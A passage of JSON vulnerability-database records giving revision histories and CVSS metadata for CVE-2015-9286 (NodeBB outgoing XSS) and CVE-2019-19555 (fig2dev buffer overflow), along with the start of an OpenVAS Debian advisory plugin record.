"cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-09-21T14:09:33", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 4}, "differentElements": ["cpeConfiguration"], "edition": 2, "lastseen": "2020-09-21T14:09:33"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-12-09T20:03:10", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-12-09T20:03:10", "rev": 2, "value": 1.4, "vector": "NONE"}}, "extraReferences": [], "hash": "48b94d9acf0e692c61f3d939f819f0ddba91180b8a5c7286e7edbacc4207d0ed", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-12-09T20:03:10", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 6}, "differentElements": ["extraReferences"], "edition": 5, "lastseen": "2020-12-09T20:03:10"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "*"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-11-30T00:13:43", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-11-30T00:13:43", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "6fe52c24d63e23f00822e673ee4063d867fb4719b46c47ea85a6bfe1400fe129", "hashmap": [{"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "71d5df73a226d76c990527e0ca95c8d8", "key": "affectedSoftware"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-11-30T00:13:43", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 5}, "differentElements": ["affectedSoftware"], "edition": 4, "lastseen": "2020-11-30T00:13:43"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-10-03T12:49:59", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-10-03T12:49:59", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "a933ff7201764471adcb8ac53cabee44c82a081f537a97f7fcd01cbed62795ec", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-10-03T12:49:59", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 5}, "differentElements": ["affectedSoftware"], "edition": 3, "lastseen": "2020-10-03T12:49:59"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "cabb6b89504f33d4cae5fb66665d6372"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "f9e1afb4d3a36011638be68c9582e6b5"}, {"key": "cvelist", "hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295"}, {"key": "cvss", "hash": "f74a1c24e49a5ecb0eefb5e51d4caa14"}, {"key": "cvss2", "hash": "4419eb17de947d4d6b67ac07ed8d9064"}, {"key": "cvss3", "hash": "f9048d548aea2a33f8c8fe44e8c9817c"}, {"key": "cwe", "hash": "34e69e045b64924bccf865d56b6918a2"}, {"key": "description", "hash": "7bcda725e0fe4634bd741d18870efc86"}, {"key": "extraReferences", "hash": "db8254901fea804d4d910fc508c1be32"}, {"key": "href", "hash": "0ac6deaa5a07331e3db4762cb458fde6"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "8e5a048329755897094215f117301c63"}, {"key": "published", "hash": "4d53af7f522025f16113d72d1dd86a79"}, {"key": "references", "hash": "dac3bc07a427ceea0c7680630fcafbdf"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "6e87bbaab34c901324df8e163b451120"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "6e9080b6a871ad58f0d05298373de4fe9c9158a2d86ff7f1a34e720d353d3e7b", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "github", "idList": ["GHSA-72FV-QGJ6-2W2P"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32625"]}], "modified": "2021-04-22T23:51:50", "rev": 2}, "score": {"value": 1.4, "vector": "NONE", "modified": "2021-04-22T23:51:50", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cpe23": [], "cwe": ["CWE-79"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://github.com/NodeBB/NodeBB/pull/3371", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"], "url": "https://github.com/NodeBB/NodeBB/pull/3371"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"}, {"name": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "refsource": "MISC", "tags": ["Third Party Advisory", "Release Notes"], "url": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529"}, {"name": "https://www.vulnerability-lab.com/get_content.php?id=1608", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://www.vulnerability-lab.com/get_content.php?id=1608"}], "immutableFields": []}], "redhatcve": [{"id": "RH:CVE-2019-19555", "hash": "d61813b174703b4397e3c7b8ca558e01", "type": "redhatcve", "bulletinFamily": "info", "title": "CVE-2019-19555", "description": "read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect sscanf.\n", "published": "2020-02-07T15:44:32", "modified": "2020-08-17T23:06:02", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, "href": "https://access.redhat.com/security/cve/cve-2019-19555", "reporter": "redhat.com", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1800631"], "cvelist": ["CVE-2019-19555"], "immutableFields": [], "lastseen": "2021-09-02T22:41:39", "history": [{"bulletin": {"id": "RH:CVE-2019-19555", "hash": "30c64afed49d5f79aa31f38294001ccd", "type": "redhatcve", "bulletinFamily": "info", "title": "CVE-2019-19555", "description": "read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect sscanf.\n", "published": "2020-02-07T15:44:32", "modified": "2020-08-17T23:06:02", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://access.redhat.com/security/cve/cve-2019-19555", "reporter": "redhat.com", "references": [], "cvelist": ["CVE-2019-19555"], "immutableFields": [], "lastseen": "2021-05-07T17:34:04", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-19555"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892073"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2073.NASL"]}], "modified": "2021-05-07T17:34:04", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-05-07T17:34:04", "rev": 2}}, "objectVersion": "1.5", "vendorCvss": {}}, "lastseen": "2021-05-07T17:34:04", "differentElements": ["references"], "edition": 1}, {"bulletin": {"id": "RH:CVE-2019-19555", "hash": "89538c7905c44e7703ced0b26f25f05e", "type": "redhatcve", "bulletinFamily": "info", "title": "CVE-2019-19555", "description": "read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect sscanf.\n", "published": "2020-02-07T15:44:32", "modified": "2020-08-17T23:06:02", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://access.redhat.com/security/cve/cve-2019-19555", "reporter": "redhat.com", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1800631"], "cvelist": ["CVE-2019-19555"], "immutableFields": [], "lastseen": "2021-05-19T23:34:59", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-19555"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-19555"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2073.NASL", "OPENSUSE-2021-2454.NASL", "SUSE_SU-2021-2454-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892073"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:2454-1"]}], "modified": "2021-05-19T23:34:59", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-05-19T23:34:59", "rev": 2}}, "objectVersion": "1.5", "vendorCvss": {}}, "lastseen": "2021-05-19T23:34:59", "differentElements": ["cvss2", "cvss3"], "edition": 2}, {"bulletin": {"id": "RH:CVE-2019-19555", "hash": "74bc96b09073929ed98f8e5b7fd90c45", "type": "redhatcve", "bulletinFamily": "info", "title": "CVE-2019-19555", "description": "read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect sscanf.\n", "published": "2020-02-07T15:44:32", "modified": "2020-08-17T23:06:02", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, "href": "https://access.redhat.com/security/cve/cve-2019-19555", "reporter": "redhat.com", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1800631"], "cvelist": ["CVE-2019-19555"], "immutableFields": [], "lastseen": "2021-07-29T04:42:16", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "ubuntucve", "idList": ["UB:CVE-2019-19555"]}, {"type": "cve", "idList": ["CVE-2019-19555"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892073"]}, {"type": "nessus", "idList": ["OPENSUSE-2021-2454.NASL", "DEBIAN_DLA-2073.NASL", "SUSE_SU-2021-2454-1.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:2454-1", "OPENSUSE-SU-2021:1143-1"]}], "modified": "2021-07-29T04:42:16", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-07-29T04:42:16", "rev": 2}}, "objectVersion": "1.6", "vendorCvss": {}}, "lastseen": "2021-07-29T04:42:16", "differentElements": ["vendorCvss"], "edition": 3}], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "ubuntucve", "idList": ["UB:CVE-2019-19555"]}, {"type": "cve", "idList": ["CVE-2019-19555"]}, {"type": "nessus", "idList": ["OPENSUSE-2021-1143.NASL", "SUSE_SU-2021-14823-1.NASL", "DEBIAN_DLA-2073.NASL", "SUSE_SU-2021-2454-1.NASL", "OPENSUSE-2021-2454.NASL", "SUSE_SU-2021-3124-1.NASL", "OPENSUSE-2021-1318.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892073"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1143-1", "OPENSUSE-SU-2021:1311-1", "OPENSUSE-SU-2021:1318-1", "OPENSUSE-SU-2021:2454-1"]}], "modified": "2021-09-02T22:41:39", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-02T22:41:39", "rev": 2}}, "objectVersion": "1.6", "vendorCvss": {"score": "6.6", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H"}, "_object_type": "robots.models.redhatcve.RedhatCVEBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhatcve.RedhatCVEBulletin"]}], "openvas": [{"id": "OPENVAS:1361412562310892073", "hash": "1d1a6be5afe19a362375bca66b3632a3", "type": "openvas", "bulletinFamily": "scanner", "title": "Debian LTS: Security Advisory for transfig (DLA-2073-1)", "description": "The remote host is missing an update for the ", "published": "2020-01-22T00:00:00", "modified": "2020-01-29T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892073", "reporter": "Copyright (C) 2020 Greenbone Networks GmbH", "references": ["https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html", "https://security-tracker.debian.org/tracker/DLA-2073-1"], "cvelist": ["CVE-2019-19555", "CVE-2018-16140", "CVE-2019-14275"], "lastseen": "2020-01-29T18:43:39", "history": [{"bulletin": {"id": "OPENVAS:1361412562310892073", "hash": "5638c79b94b05b2df9f575db894241a664934d6c4a3586cd47ab5ff87f46b6d0", "type": "openvas", "bulletinFamily": "scanner", "title": "Debian LTS Advisory ([SECURITY] [DLA 2073-1] transfig security update)", "description": "The remote host is missing an update for the ", "published": "2020-01-22T00:00:00", "modified": "2020-01-22T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892073", "reporter": "Copyright (C) 2020 Greenbone Networks GmbH", "references": ["https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html", "https://security-tracker.debian.org/tracker/DLA-2073-1"], "cvelist": ["CVE-2019-19555", "CVE-2018-16140", "CVE-2019-14275"], "lastseen": "2020-01-22T14:34:24", "history": [], "viewCount": 30, "enchantments": {"dependencies": {"modified": "2020-01-22T14:34:24", "references": [{"idList": ["USN-3760-1"], "type": "ubuntu"}, {"idList": ["DEBIAN:DLA-2073-1:017FC"], "type": "debian"}, {"idList": ["OPENVAS:1361412562310843744", "OPENVAS:1361412562310852517"], "type": "openvas"}, {"idList": ["OPENSUSE-SU-2019:1455-1"], "type": "suse"}, {"idList": ["UBUNTU_USN-3760-1.NASL", "OPENSUSE-2019-1455.NASL"], "type": "nessus"}, {"idList": ["CVE-2019-19555", "CVE-2018-16140", "CVE-2019-14275"], "type": "cve"}]}, "score": {"modified": "2020-01-22T14:34:24", "value": 7.0, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310892073", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of 